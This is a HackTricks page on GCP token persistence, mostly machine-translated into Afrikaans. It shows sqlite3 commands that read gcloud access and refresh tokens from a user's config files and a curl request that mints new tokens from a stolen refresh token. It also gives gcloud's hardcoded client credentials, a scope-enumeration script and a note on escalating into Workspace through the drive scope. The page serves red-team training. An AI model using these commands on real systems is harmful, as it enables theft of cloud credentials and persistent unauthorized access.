GCP - Token Persistance

Leer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Geverifieerde Gebruikerstokens

Om die huidige token van 'n gebruiker te verkry, kan jy die volgende uitvoer:

sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"

Kyk op hierdie bladsy hoe om hierdie token direk met gcloud te gebruik:

Om die besonderhede te kry om 'n nuwe toegangstoken te genereer voer in:

sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"

Dit is ook moontlik om verfris tokens te vind in $HOME/.config/gcloud/application_default_credentials.json en in $HOME/.config/gcloud/legacy_credentials/*/adc.json.

Om 'n nuwe verfriste toegangstoken met die verfris token, kliënt-ID, en kliënt geheim te verkry, voer in:

curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token

Die geldigheid van die herlaai tokens kan bestuur word in Admin > Security > Google Cloud sessiebeheer, en standaard is dit op 16 uur ingestel, hoewel dit op nooit verval kan word ingestel:

Auth flow

Die outentikasie vloei wanneer iets soos gcloud auth login gebruik word, sal 'n prompt in die blaaiers oopmaak en na die aanvaarding van al die skope sal die blaaiers 'n versoek soos hierdie een na die http-poort wat deur die hulpmiddel oopgemaak is, stuur:

/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1

Then, gcloud sal die toestand en kode gebruik met 'n paar hardgecodeerde client_id (32555940559.apps.googleusercontent.com) en client_secret (ZmssLNjJy2998hD4CTg2ejr2) om die finale hernuwingstoken data te verkry.

Let daarop dat die kommunikasie met localhost in HTTP is, so dit is moontlik om die data te onderskep om 'n hernuwingstoken te verkry, maar hierdie data is net 1 keer geldig, so dit sou nutteloos wees, dit is makliker om net die hernuwingstoken uit die lêer te lees.

OAuth Scopes

Jy kan al die Google scopes vind in https://developers.google.com/identity/protocols/oauth2/scopes of hulle verkry deur die volgende uit te voer:

curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u

Dit is moontlik om te sien watter skope die toepassing wat gcloud gebruik om te autentiseer, kan ondersteun met hierdie skrip:

curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope         \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done

Na uitvoering daarvan is dit nagegaan dat hierdie toepassing hierdie skope ondersteun:

https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email

it's interesting to see how this app supports the drive scope, which could allow a user to escalate from GCP to Workspace if an attacker manages to force the user to generate a token with this scope.

Check how to abuse this here.

Service Accounts

Net soos met geverifieerde gebruikers, as jy daarin slaag om die privaat sleutel lêer van 'n diensrekening te kompromitteer, sal jy in staat wees om dit gewoonlik te gebruik solank as wat jy wil. However, if you steal the OAuth token of a service account this can be even more interesting, because, even if by default these tokens are useful just for an hour, if the victim deletes the private api key, the OAuh token will still be valid until it expires.

Metadata

Dit is duidelik dat, solank jy binne 'n masjien is wat in die GCP omgewing loop, jy in staat sal wees om die diensrekening wat aan daardie masjien gekoppel is te benader deur die metadata eindpunt te kontak (let daarop dat die Oauth tokens wat jy in hierdie eindpunt kan benader gewoonlik deur scopes beperk is).

Remediations

Some remediations for these techniques are explained in https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2

References

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousGCP - Storage Persistence NextGCP - Services

Last updated 3 days ago

curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token

/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1

curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do echo -ne "Testing $scope \r" if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then echo "" echo $scope fi done

https://www.googleapis.com/auth/appengine.admin https://www.googleapis.com/auth/bigquery https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/devstorage.full_control https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/userinfo.email